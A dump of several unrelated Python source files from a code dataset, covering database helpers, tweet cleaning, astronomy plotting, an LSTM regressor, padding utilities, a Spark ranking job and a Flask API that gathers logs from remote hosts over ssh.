————————————————————————————————————————\n\ndef start_connection():\n\ttry:\n\t\timport mysql.connector\n\t\tcnx = mysql.connector.connect(\tuser=DB_USER, password=DB_PASSWD,\n\t\t\t\t\t\t host=DB_IP, port=DB_PORT,\n\t\t\t\t\t\t database=DB_NAME)\n\t\treturn cnx\n\texcept Exception as error:\n\t\tErrorWriter.write_error(error)\n\t\treturn None\n\n\ndef connect_to_DB():\n\tcnx = start_connection()\n\twhile is_null_sleep_then(cnx):\n\t\tcnx = start_connection() # connect\n\tcursor = cnx.cursor(buffered=True)\n\treturn cnx, cursor","sub_path":"DatabasePortal/Python/IndividualRPi/DBFunctions.py","file_name":"DBFunctions.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264223840","text":"# -*- coding: utf-8 -*-\nfrom pymongo import MongoClient\nfrom nltk.corpus import stopwords\nimport re\n\nclient = MongoClient('localhost', 27017)\ndb=client.MinorProject\n\ndef processTweet(text):\n #text = re.sub(r'^http?:\\/\\/.*[\\r\\n]*', '', text, flags=re.MULTILINE)\n text=text.lower()\n stop = stopwords.words('english')\n stop.extend(['rt'])\n a= [i for i in text.split() if i not in stop and \"@\" not in i]\n a=[re.sub(r'http?:\\/\\/.*[\\r\\n]*', '', i, flags=re.MULTILINE) for i in a]\n a= [re.sub('[^A-Za-z0-9]+', '', i) for i in a]\n a= [i for i in a if len(i)>1 and i not in stop]\n return \" \".join(a)\n\n'''\n#this is for entries received from the json dump file\nentries=db.clean_tweets.find()\n\nfor e in entries:\n for s in e['screen_name']:\n \n processedTweet=processTweet(e['text'])\n urls=e['urls']\n \n #print s,processedTweet,urls\n \n feature_entry=db.user_tweets.find_one({'screen_name':s})\n print s,feature_entry\n if processedTweet is None:\n processedTweet=[]\n \n if urls is None:\n urls=[]\n \n if feature_entry is None:\n feature_entry={'screen_name':s,\n 'feature_list':[processedTweet],\n 'urls':[urls]\n }\n \n db.user_tweets.insert(feature_entry)\n \n else:\n feature_list=feature_entry['feature_list']\n feature_list.extend([processedTweet])\n urls=feature_entry['urls']\n urls.extend([e['urls']])\n feature_list=list(set(feature_list))\n \n db.user_tweets.update(\n { 'screen_name':s },\n {\n '$set': {\n 'feature_list': feature_list,\n 'urls': urls \n }\n },upsert=False)\n \nfinal_entries=db.user_tweets.find()\nfor e in final_entries:\n tobeenteredfl=[] \n feature_list=e['feature_list']\n for fl in feature_list:\n flentry=fl.split()\n tobeenteredfl.extend(flentry)\n feature_entry={'screen_name':e['screen_name'],\n 'feature_list':tobeenteredfl,\n 'urls':list(set(e['urls']))\n }\n \n db.user_features.insert(feature_entry)\n'''\n#this is for the tweets pulled real time\n\nreal_user_tweets=db.real_user_tweets.find()\n\nfor rut in real_user_tweets:\n s=rut['user']['screen_name'] \n rct=db.real_clean_tweets.find_one({\"screen_name\":s})\n if rct is None:\n tweets=db.real_user_tweets.find({\"user.screen_name\" : s})\n feature_list=list(set([processTweet(t['text']) for t in tweets]))\n entry={\n 'screen_name':s,\n 'feature_list':feature_list\n }\n db.real_clean_tweets.insert(entry)","sub_path":"CleaningData/mergeUserFeatures.py","file_name":"mergeUserFeatures.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154721811","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport urllib\nSDSS_File = '/Users/compastro/jenkins/SDSS_4363+3_z+0.04.csv'\nSDSS_Data = np.genfromtxt(SDSS_File,skip_header=2, delimiter = ',',dtype=float,unpack=True)\nNII_6583 = SDSS_Data[28,:]\nHa_6562 = SDSS_Data[27,:]\nOIII_5006 = SDSS_Data[20,:]\nHb_4861 = SDSS_Data[18,:]\nOIII_4363 = SDSS_Data[14,:]\nOIII_Hb = np.log10(OIII_5006/Hb_4861)\nNII_Ha = np.log10(NII_6583/Ha_6562)\nplt.figure()\nplt.xlim(-1.5,0.5)\nplt.ylim(-1,1.5)\n#plt.scatter(NII_Ha,OIII_Hb,s=30,c='b')\nx=np.linspace(-1.5,0.3,50)\ny=((.61/(x-.47))+1.19)\nplt.plot(x,y,color='k')\nx3=np.linspace(-1,-0.2,50)\ny3=((.61/(x3-.05)+1.3))\nplt.plot(x3,y3,linestyle='--',color='red')\ncounter=0\nfor i in range(0,len(SDSS_Data[0,:])):\n if OIII_5006[i]/OIII_4363[i]<100.0:\n cool = plt.scatter(NII_Ha[i],OIII_Hb[i],color='r')\n counter=counter+1\n #print (\"madeit\")\n elif OIII_5006[i]/OIII_4363[i]>100.0 and OIII_5006[i]/OIII_4363[i]<1000.0:\n mid_temp = plt.scatter(NII_Ha[i],OIII_Hb[i],color='g')\n counter=counter+1\n #print(\"k\")\n elif OIII_5006[i]/OIII_4363[i]>1000.0:\n hot = plt.scatter(NII_Ha[i],OIII_Hb[i],color='k')\n counter=counter+1\n #print (\"r\")\n else:\n print (\"error\")\nprint(counter)\nplt.legend((cool, mid_temp, hot), ('Low Te','Mid Te','High Te'), scatterpoints = 1, loc = 'lower left', ncol = 3, fontsize =8)\nplt.ylabel(r\"log ([OIII] $\\lambda$5007/H$\\beta$)\")\nplt.xlabel(r\"log ([NII] $\\lambda$6584/H$\\alpha$)\")\nplt.title(\"BPT Diagram (AoN OIII_4363 > 3.0)\")\nplt.show()\n#subplots showing two plots of the same file next to each other, one BPT and one 5007/4363 (temp) vs. NII/Hb (ionization)\n#in notebook, write about trends shown in plots (low temp AGN, high temp mid ionization SF, etc.)\n","sub_path":"Metals_Sims/z_+_04_4363_3.py","file_name":"z_+_04_4363_3.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329191267","text":"books = {1:'a', 2:'b', 3:'c', 4:'d', 5:'d'}\nb_list = {}\nwhile True:\n name = input(\"회원의 이름을 입력하세요 : \")\n if name == 'q':\n break\n if name not in b_list.keys():\n b_list[name] = []\n print(b_list)\n while True:\n code = input(\"빌릴 책의 코드 : \")\n if code == 'q':\n break\n code = int(code)\n available = True\n for temp_name in b_list.keys():\n if books[code] in b_list[temp_name]:\n available = False\n break\n if available :\n b_list[name].append(books[code])\n else:\n print(\"이미 대출된 책입니다.\")\n if len(b_list[name]) >= 3:\n break\nprint(\"현재 대출자 목록\")\nprint(b_list)\n","sub_path":"2분기 프로젝트/CDTB_데이터_활용_경진대회/WebCrawling/ect.py","file_name":"ect.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649107238","text":"\n\ndef link_crawl_execute(session,downlaoder,seed_url,func):\n urls = []\n urls.extend(seed_url)\n\n item=urls.pop()\n while item:\n resp = downlaoder(item[0])\n newUrls = func(session, resp)\n urls.extend(newUrls)\n item=urls.pop()","sub_path":"requester/requester/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343086623","text":"# coding=utf-8\n\"\"\"\nAdd the following to your *requirements.txt* file:\n\n* coverage\n* nose\n\n\"\"\"\n\n__docformat__ = 'restructuredtext en'\n\nfrom herring.herring_app import task\nfrom project_settings import Project, packages_required\nfrom local_shell import LocalShell\n\n\nrequired_packages = [\n 'coverage',\n 'nose'\n]\n\nif packages_required(required_packages):\n @task()\n def test():\n \"\"\" Run the unit tests \"\"\"\n with LocalShell() as local:\n local.run((\"nosetests -vv --where=%s\" % Project.tests_dir).split(' '))\n","sub_path":"herringlib/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239768400","text":"import pygame\n\ndef main():\n\n # Initialize pygame module\n pygame.init()\n logo = pygame.image.load(\"gear bronze rotate 1.0.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Engineworks\")\n\n # Create screen surface\n screen = pygame.display.set_mode((200, 200))\n\n # Set variable that controls the loop\n running = True\n\n # Main loop\n while running:\n # Event handling, gets all events from the event queue\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\nif __name__ == \"__main__\":\n # Call main\n main()\n # https://www.pygame.org/wiki/tutorials\n\n # Current use tutorial: https://dr0id.bitbucket.io/legacy/pygame_tutorial00.html","sub_path":"public/pygame_example/pygame_main.py","file_name":"pygame_main.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386918251","text":"# Open file and set up vars\ninputTxt = open(\"Day 1/input.txt\", \"r\")\nyears = []\nimported = 0\n\n\n# Define function to check each number in array against all others\ndef doMath():\n for num1 in years:\n for num2 in years:\n if((num1 + num2) == 2020):\n product = num1 * num2\n print(\"2020 found, answer: \" + str(product))\n return\n\n# Import all years into array\nwhile imported == 0:\n line1 = inputTxt.readline()\n if(len(line1) > 0):\n years.append(int(line1))\n else:\n imported = 1\nprint(\"Years imported: \" + str(len(years)))\n\n# Call the math function\ndoMath()","sub_path":"Day 1/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72307093","text":"#! /usr/bin/env python3\nimport re, json\nfrom math import log2, log10, ceil\nfrom functools import partial\nfrom pyspark import SparkContext\n\ndef ceil5(x):\n return ceil(x/5)*5\n\ndef get_winner_loser(match):\n ms = match.split(',')\n # Put the loser in first position, winner in second\n return (ms[20], ms[10])\n\ndef initialize_voting(losses):\n return {'losses': losses,\n 'n_losses': len(losses),\n 'rating': 100}\n\ndef empty_ratings(d):\n d['rating'] = 0\n return d\n\ndef allocate_points(acc, nxt, i):\n k,v = nxt\n if i == 0:\n boost = 100 / (v['n_losses']+.01)\n else:\n boost = v['rating'] / (v['n_losses'] + .01)\n for loss in v['losses']:\n if loss not in acc.keys():\n acc[loss] = {'losses':[], 'n_losses': 0}\n opp_rating = acc.get(loss,{}).get('rating',0)\n acc[loss]['rating'] = opp_rating + boost\n return acc\n\ndef combine_scores(a, b):\n for k,v in b.items():\n try:\n a[k]['rating'] = a[k]['rating'] + b[k]['rating']\n except KeyError:\n a[k] = v\n return a\n\nif __name__ == \"__main__\":\n sc = SparkContext(appName=\"WikiMap\")\n entries = sc.textFile(\"wikipedia_edges.txt\")\n xs = entries.flatMap(lambda x:x.split('\\n'))\\\n .map(lambda x:x.split('\\t'))\\\n .groupByKey()\\\n .mapValues(initialize_voting)\n\n for i in range(7):\n if i > 0:\n xs = sc.parallelize(zs.items())\n acc = dict(xs.mapValues(empty_ratings).collect())\n agg_f = partial(allocate_points, i=i)\n zs = xs.aggregate(acc, agg_f, combine_scores)\n\n ratings = [(k,v['rating']) for k,v in zs.items()]\n for player, rating in sorted(ratings, key=lambda x: x[1], reverse=True)[:50]:\n print('{:<30}{}\\t{}'.format(player,\n round(log2(rating+1), 1),\n ceil5(rating)))\n","sub_path":"Code/Ch09/spark_wikipedia_mapreduce.py","file_name":"spark_wikipedia_mapreduce.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401339398","text":"import keras\nfrom keras.models import Sequential\nfrom keras.models import model_from_json\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import LSTM\nfrom keras.layers import BatchNormalization\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import normalize\nfrom keras.optimizers import adam\nfrom keras.callbacks import EarlyStopping\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pickle\nimport math\nfrom keras import backend as K\n\n# helper functions\ndef cleanMissingValues(dataset):\n print('cleaning dataset.')\n cleanedDataset = dataset\n shape = cleanedDataset.shape\n if shape[1] == 8:\n cleanedDataset[\"target\"] = 0\n cleanedDataset[\"missing\"] = False\n rowDroppedCount = 0\n for x in range(0, shape[0]):\n maxRowMissingValuesReached = False\n rowDropThreshold = len(cleanedDataset.iloc[x, 2]) / 10 * 9\n for y in range(2, 8):\n nanCount = 0\n meanTotal = 0\n meanNum = 0\n maxColMissingValuesReached = False\n nanPresent = False\n for z in cleanedDataset.iloc[x, y]:\n if math.isnan(z):\n nanCount = nanCount + 1\n nanPresent = True\n elif maxRowMissingValuesReached == False:\n meanNum = meanNum + 1\n meanTotal = meanTotal + z\n if nanCount > rowDropThreshold:\n maxRowMissingValuesReached = True\n maxColMissingValuesReached = True\n elif nanPresent and maxRowMissingValuesReached == False:\n mean = meanTotal / meanNum\n for z in range(0, len(cleanedDataset.iloc[x, y])):\n if math.isnan(cleanedDataset.iloc[x, y][z]):\n cleanedDataset.iloc[x, y][z] = mean\n if maxRowMissingValuesReached:\n cleanedDataset.iloc[x, 9] = True\n cleanedDataset = cleanedDataset[cleanedDataset.missing == False]\n cleanedDataset = cleanedDataset.drop(\"missing\", axis=1)\n shape = cleanedDataset.shape\n return cleanedDataset\n\ndef reshapeDataSet(datasetTrain, datasetValidate):\n print('reshaping dataset.')\n expandedDatasetTrain = datasetTrain\n expandedDatasetValidate = datasetValidate\n shape = expandedDatasetTrain.shape\n cubeTrain = list()\n for x in range(0, shape[0]):\n square = list()\n for y in range(0, 6):\n column = list()\n for z in expandedDatasetTrain.iloc[x, y]:\n column.append(z)\n square.append(column)\n cubeTrain.append(square)\n cubeTrain = np.dstack(cubeTrain)\n shape = expandedDatasetValidate.shape\n cubeValidate = list()\n for x in range(0, shape[0]):\n square = list()\n for y in range(0, 6):\n column = list()\n for z in expandedDatasetValidate.iloc[x, y]:\n column.append(z)\n square.append(column)\n cubeValidate.append(square)\n cubeValidate = np.dstack(cubeValidate)\n for x in range(0, cubeTrain.shape[0]):\n sliceToNormaliseTrain = cubeTrain[x, :, :]\n sliceToNormaliseValidate = cubeValidate[x, :, :]\n sliceToNormaliseTrainMax = np.max(sliceToNormaliseTrain)\n sliceToNormaliseValidateMax = np.max(sliceToNormaliseValidate)\n sliceToNormaliseTrainMin = np.min(sliceToNormaliseTrain)\n sliceToNormaliseValidateMin = np.min(sliceToNormaliseValidate)\n maxToUse = 0\n minToUse = 0\n if sliceToNormaliseTrainMax > sliceToNormaliseValidateMax:\n maxToUse = sliceToNormaliseTrainMax\n else:\n maxToUse = sliceToNormaliseValidateMax\n if sliceToNormaliseTrainMin < sliceToNormaliseValidateMin:\n minToUse = sliceToNormaliseTrainMin\n else:\n minToUse = sliceToNormaliseValidateMin\n sliceToNormaliseTrain = (sliceToNormaliseTrain - minToUse) / (maxToUse - minToUse)\n sliceToNormaliseValidate = (sliceToNormaliseValidate - minToUse) / (maxToUse - minToUse)\n cubeTrain[x, :, :] = sliceToNormaliseTrain\n cubeValidate[x, :, :] = sliceToNormaliseValidate\n return cubeTrain, cubeValidate\n\n# reading in necessary train and test files\ntrainDataUrl = '../data/Train.p'\ntestDataUrl = '../data/Test.p'\ninfile = open(trainDataUrl,'rb')\ntrainData = pickle.load(infile)\ninfile.close()\ninfile = open(testDataUrl,'rb')\ntestData = pickle.load(infile)\ninfile.close()\n\n# # reading in pre-processed data\n# trainDataUrl = 'shapableTraining.pickle'\n# # testDataUrl = '../data/Test.p'\n# infile = open(trainDataUrl,'rb')\n# trainData = pickle.load(infile)\n# infile.close()\n# # infile = open(testDataUrl,'rb')\n# # testData = pickle.load(infile)\n# # infile.close()\n\nprint(\"dataset samples before cleaning:\")\nprint(trainData.shape[0])\n\n# cleaning missing input values\ntrainData = cleanMissingValues(trainData)\n\n# splitting X and Y values\nY_train = trainData.target\nX_train = trainData.drop('target', axis=1)\nX_train, X_validate, Y_train, Y_validate = train_test_split(X_train, Y_train, train_size=0.8, random_state=50)\nprint(\"training set samples:\")\nprint(X_train.shape[0])\nprint(\"validation set samples:\")\nprint(X_validate.shape[0])\n\n# reshaping data for CNN\nX_train = X_train.iloc[:, 2:8]\nX_validate = X_validate.iloc[:, 2:8]\nX_train, X_validate = reshapeDataSet(X_train, X_validate)\n\n# saving shaped dataset\npickle_out = open(\"shapableTraining.pickle\",\"wb\")\npickle.dump(X_train, pickle_out)\npickle_out.close()\n\nX_train_CNN = np.reshape(X_train, (X_train.shape[2], 121, 6, 1))\nX_validate_CNN = np.reshape(X_validate, (X_validate.shape[2], 121, 6, 1))\n\n# # load json and create model\n# json_file = open('model.json', 'r')\n# loaded_model_json = json_file.read()\n# json_file.close()\n# model = model_from_json(loaded_model_json)\n# # load weights into new model\n# model.load_weights(\"model.h5\")\n# print(\"Loaded model from disk\")\n\n# build CNN model\nmodel = Sequential()\nmodel.add(LSTM(32, input_shape = (121, 6)))\nmodel.add(Dense(1, activation='linear'))\n\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=50)\nopt = adam(lr=0.0001)\nmodel.compile(loss=\"mean_absolute_percentage_error\", optimizer=opt)\n\nprint('training model.')\nmodel.fit(x=X_train_CNN, y=Y_train, validation_data=(X_validate_CNN, Y_validate), epochs=1000, batch_size=16, callbacks=[es])\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"model.h5\")\nprint(\"Saved model to disk\")\n\n# making predictions\nprint('making predictions.')\npreds = model.predict(X_validate_CNN)\n\ndiff = preds.flatten() - Y_validate\npercentDiff = (diff / Y_validate) * 100\nabsPercentDiff = np.abs(percentDiff)\n\nmean = np.mean(absPercentDiff)\nstd = np.std(absPercentDiff)\n\nprint('mean: {:.2f}%, std: {:.2f}%'.format(mean, std))","sub_path":"code/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425803953","text":"#coding: utf-8\nimport numpy as np\nimport os, re, sys, random, copy, time, json\nfrom core.vocabulary.base import PAD_ID\n\nclass DatasetBase(object):\n @property\n def size(self):\n train_size = self.train.size if hasattr(self.train, 'size') else 0\n valid_size = self.valid.size if hasattr(self.valid, 'size') else 0\n test_size = self.test.size if hasattr(self.test, 'size') else 0\n return train_size, valid_size, test_size\n\n# Functions for padding.\n\ndef fill_empty_brackets(sequence, max_len):\n \"\"\"\n - sequence: A 1D list of list.\n \"\"\"\n return sequence + [[] for _ in range(max_len - len(sequence))]\n\ndef fill_zero(sequence, length): # 最長系列が短すぎたときに0埋め\n '''\n Make the length of a sequence at least 'length' by truncating of filling 0.\n Args:\n sequence: A 1D list of integer.\n length: an integer.\n '''\n if len(sequence) < length:\n return sequence + [0 for _ in range(length - len(sequence))]\n else:\n return sequence\n\n\ndef define_length(batch, minlen=None, maxlen=None):\n if minlen is None:\n minlen = 0\n\n if maxlen:\n return max(maxlen, minlen) \n else:\n return max([len(b) for b in batch] + [minlen])\n\ndef padding_2d(batch, minlen=None, maxlen=None, pad=PAD_ID, pad_type='post'):\n '''\n Args:\n batch: a 2D list. \n maxlen: an integer.\n Return:\n A 2D tensor of which shape is [batch_size, max_num_word].\n '''\n if type(maxlen) == list:\n maxlen = maxlen[0]\n if type(minlen) == list:\n minlen = minlen[0]\n\n length_of_this_dim = define_length(batch, minlen, maxlen)\n return np.array([fill_zero(l[:length_of_this_dim], length_of_this_dim) for l in batch])\n\ndef padding(batch, minlen, maxlen, pad=PAD_ID):\n '''\n Args:\n - batch: A list of tensors with different shapes.\n - minlen, maxlen: A list of integers or None. Each i-th element specifies the minimum (or maximum) size of the tensor in the rank i+1.\n minlen[i] is considered as 0 if it is None, and maxlen[i] is automatically set to be equal to the maximum size of 'batch', the input tensor.\n \n e.g. \n [[1], [2, 3], [4, 5, 6]] with minlen=[None], maxlen=[None] should be\n [[1, 0, 0], [2, 3, 0], [4, 5, 6]]\n '''\n assert len(minlen) == len(maxlen)\n rank = len(minlen) + 1\n padded_batch = []\n\n length_of_this_dim = define_length(batch, minlen[0], maxlen[0])\n if rank == 2:\n return padding_2d(batch, minlen=minlen[0], maxlen=maxlen[0], pad=pad)\n\n for l in batch:\n l = fill_empty_brackets(l[:length_of_this_dim], length_of_this_dim)\n if rank == 3:\n l = padding_2d(l, minlen=minlen[1:], maxlen=maxlen[1:], pad=pad)\n else:\n l = padding(l, minlen=minlen[1:], maxlen=maxlen[1:], pad=pad)\n\n padded_batch.append(l)\n largest_shapes = [max(n_dims) for n_dims in zip(*[tensor.shape for tensor in padded_batch])]\n target_tensor = np.zeros([len(batch)] + largest_shapes)\n\n for i, tensor in enumerate(padded_batch):\n pad_lengths = [x - y for x, y in zip(largest_shapes, tensor.shape)]\n pad_shape = [(0, l) for l in pad_lengths] \n padded_batch[i] = np.pad(tensor, pad_shape, 'constant')\n return np.array(padded_batch)\n","sub_path":"core/dataset/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"221356288","text":"#!/usr/bin/env python\nimport argparse\nimport json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom datetime import datetime\nfrom flask import Flask, Response\nfrom flask_cors import CORS\nfrom flask_restful import Api, Resource, fields, marshal, abort\n\n\napp = Flask(__name__)\nCORS(app)\napi = Api(app, prefix='/logs/v1.0')\n\nARCHIVE_BASE_DIR = tempfile.gettempdir()\nCONFIG_FILE = '/etc/log-collector-api.json'\n\nLOG_FORMAT = '%(asctime)s %(levelname) -8s %(message)s'\n\nconfig = None\nroot_logger = None\n\n\nclass ServiceConfig(object):\n \"\"\"Configuration for the service.\"\"\"\n\n def __init__(self, file_path):\n self._file_path = file_path\n\n self._bind_address = None\n self._bind_port = None\n self._debug = False\n\n self._hosts = []\n\n self.load()\n\n def load(self):\n \"\"\"Load the configuration.\"\"\"\n with open(self.file_path, 'rb') as fp:\n config = json.load(fp)\n\n self._bind_address = config['server']['bind']\n self._bind_port = config['server']['port']\n self._debug = config['server']['debug']\n\n self._hosts = config['hosts']\n\n @property\n def file_path(self):\n \"\"\"Configuration file path.\"\"\"\n return self._file_path\n\n @property\n def bind_address(self):\n \"\"\"Address to bind the service to.\"\"\"\n return self._bind_address\n\n @property\n def bind_port(self):\n \"\"\"Port to listen on.\"\"\"\n return self._bind_port\n\n @property\n def debug(self):\n \"\"\"Debug flag.\"\"\"\n return self._debug\n\n @property\n def hosts(self):\n \"\"\"List of host dicts.\"\"\"\n return self._hosts\n\n\ndef setup_logging():\n \"\"\"Configuration the logging module and returns the root logger.\"\"\"\n formatter = logging.Formatter(LOG_FORMAT)\n\n console = logging.StreamHandler()\n console.setFormatter(formatter)\n console.setLevel(logging.INFO)\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n logger.addHandler(console)\n\n return logger\n\n\ndef get_cmdline_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', metavar='FILE', default=CONFIG_FILE,\n help='the configuration file (default: %(default)s')\n return parser.parse_args()\n\n\ndef copy_remote_dir(host, src, dest):\n copy_remote_file(host, src, dest, True)\n\n\ndef copy_remote_file(host, src, dest, recursive=False):\n \"\"\"Copies *src* from *host* to *dest*. Copies recurively if *recursive* is\n True.\n \"\"\"\n dest_filename = '%s-%s' % (host, os.path.basename(src))\n command = [\n 'scp',\n '-o',\n 'BatchMode=yes',\n '-o',\n 'StrictHostKeyChecking=no',\n '%s:%s' % (host, src),\n os.path.join(dest, dest_filename)\n ]\n\n if recursive:\n command.insert(1, '-r')\n\n with open(os.devnull, 'w') as fnull:\n subprocess.check_call(command, stdout=fnull, stderr=subprocess.STDOUT)\n\n\ndef save_command_output(host, remote_command, filename, destdir):\n \"\"\"Runs *remote_command* on *host* and saves the stdout and stderr to\n *filename* in *destdir*.\n \"\"\"\n command = [\n 'ssh',\n '-o',\n 'BatchMode=yes',\n '-o',\n 'StrictHostKeyChecking=no',\n host,\n remote_command\n ]\n p = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n out, err = p.communicate()\n\n dest_filename = '%s-%s' % (host, filename)\n filepath = os.path.join(destdir, dest_filename)\n with open(filepath, 'wb') as fp:\n fp.write(out)\n\n\ndef build_archive(filepath):\n \"\"\"Builds the support log archive based on the files and commands listed\n in the configuration file.\n \"\"\"\n # Get a temporary directory in which the files will be accumulated.\n tempdir = tempfile.mkdtemp()\n root_logger.info(\"Will accumulate files in %s\", tempdir)\n\n for hostname in config.hosts:\n entries = config.hosts[hostname]\n for entry in entries:\n # Save a command's output\n if entry['type'] == 'execute':\n root_logger.info(\"Saving output of %s\", entry['command'])\n try:\n save_command_output(hostname, entry['command'],\n entry['filename'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to execute: %s\", e)\n elif entry['type'] == 'file':\n root_logger.info(\"Copying %s from %s\", entry['filename'],\n hostname)\n try:\n copy_remote_file(hostname, entry['filename'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to copy %s: %s\",\n entry['filename'], e)\n elif entry['type'] == 'directory':\n root_logger.info(\"Copying %s from %s\", entry['path'], hostname)\n try:\n copy_remote_dir(hostname, entry['path'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to copy %s: %s\",\n entry['path'], e)\n else:\n root_logger.warning(\"Unknown entry type: %s\", entry['type'])\n\n root_logger.info(\"Compressing %s to %s\", tempdir, filepath)\n command = ['tar', 'Jcfp', filepath, tempdir]\n with open(os.devnull, 'w') as fnull:\n subprocess.check_call(command, stdout=fnull, stderr=subprocess.STDOUT)\n\n root_logger.info('Cleaning up temporary directory')\n shutil.rmtree(tempdir)\n\n\ndef get_archive(filepath, chunk=1024):\n \"\"\"Generator to get the archive data in chunks. Default chunk: 1KB\"\"\"\n with open(filepath, 'rb') as fp:\n while True:\n data = fp.read(chunk)\n if not data:\n break\n yield data\n\n\nclass Collector(Resource):\n\n ARCHIVE_NAME_FORMAT = 'SUPPORT_LOGS_{timestamp}.tar.xz'\n TIMESTAMP_FORMAT = '%Y%m%dT%H%M%S%Z'\n\n FIELDS = {\n \"filesize\": fields.Float,\n \"filename\": fields.String\n }\n\n def get(self):\n \"\"\"Collect the logs and then return the file size of the log archive\n in MB.\n \"\"\"\n now = datetime.now()\n timestamp = now.strftime(self.TIMESTAMP_FORMAT)\n filename = self.ARCHIVE_NAME_FORMAT.format(timestamp=timestamp)\n filepath = os.path.join(ARCHIVE_BASE_DIR, filename)\n\n try:\n build_archive(filepath)\n except Exception as e:\n root_logger.error(\"Failed to build support archive: %s\", e)\n return {'error': 'Failed to build support archive'}, 500\n\n stat = os.stat(filepath)\n filesize = stat.st_size / float(1024 * 1024)\n\n data = {'filesize': filesize, 'filename': filename}\n return marshal(data, self.FIELDS)\n\n\nclass Downloader(Resource):\n\n # noinspection PyMethodMayBeStatic\n def get(self, filename):\n \"\"\"Downloads the log archive.\"\"\"\n filepath = os.path.join(ARCHIVE_BASE_DIR, filename)\n if not os.path.exists(filepath):\n root_logger.error(\"%s does not exist\", filepath)\n abort(404)\n\n stat = os.stat(filepath)\n filesize = stat.st_size\n\n headers = {\n 'Content-Disposition': 'filename=%s' % filename,\n 'Content-Length': filesize\n }\n\n return Response(get_archive(filepath), mimetype='application/x-gtar',\n headers=headers)\n\napi.add_resource(Collector, '/collect')\napi.add_resource(Downloader, '/download/')\n\n\ndef main():\n global root_logger, config\n\n root_logger = setup_logging()\n args = get_cmdline_args()\n try:\n config = ServiceConfig(args.config)\n except IOError as exc:\n root_logger.error(\"Failed to load configuration: %s\", exc)\n sys.exit(1)\n\n app.run(host=config.bind_address, port=config.bind_port,\n debug=config.debug)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"log-collector-api.py","file_name":"log-collector-api.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176180852","text":"from app.utility import work_with_excel\nfrom app.utility.work_with_excel import (\n get_static_data,\n get_column_names,\n)\nimport re, os\nfrom datetime import datetime\n\ntimestamp = datetime.now().strftime(\"%d%b%y_%H-%M\")\n\n\ndef recording(\n all_categories,\n ovs_folder,\n ovs_static,\n subconstructor_overstock,\n frame_amazon,\n pagename_amazon,\n static_amazon,\n subconstructor_amazon,\n decoration_data,\n):\n print(\"-------category generating data-------\")\n amazon_output_data = []\n no_image = []\n successfull_items = 0\n amazon_image_cells = []\n amazon_colnames = get_column_names(frame_amazon, pagename_amazon)\n amazon_sta_data = get_static_data(static_amazon)\n overstock_sta_data = get_static_data(ovs_static)\n for colname in amazon_colnames:\n match = re.search(r\"_image_url\", colname)\n if match:\n amazon_image_cells.append(colname)\n\n for one_category in all_categories:\n items_qty = len(one_category)\n overstock_output_data = []\n previous_pagename = \"\"\n count = 0\n for item in one_category:\n count += 1\n pagename = item.pagename_ovs\n filename = item.filename_ovs\n\n if previous_pagename and previous_pagename != pagename:\n suffix = \"\".join(\n previous_filename.rsplit(\"/\", 1)[-1]\n .split(\"-\")[-1]\n .split(\".\")[0]\n .split(\" \")\n )\n out_filename = f\"{ovs_folder}/{suffix}.xlsx\"\n work_with_excel.printing(\n overstock_output_data,\n previous_filename,\n out_filename,\n previous_pagename,\n )\n overstock_output_data = []\n overstock_colnames = get_column_names(filename, pagename)\n else:\n if count == 1:\n overstock_colnames = get_column_names(filename, pagename)\n overstock_main_image_cells = []\n overstock_option_image_cells = []\n for colname in overstock_colnames:\n match_main = 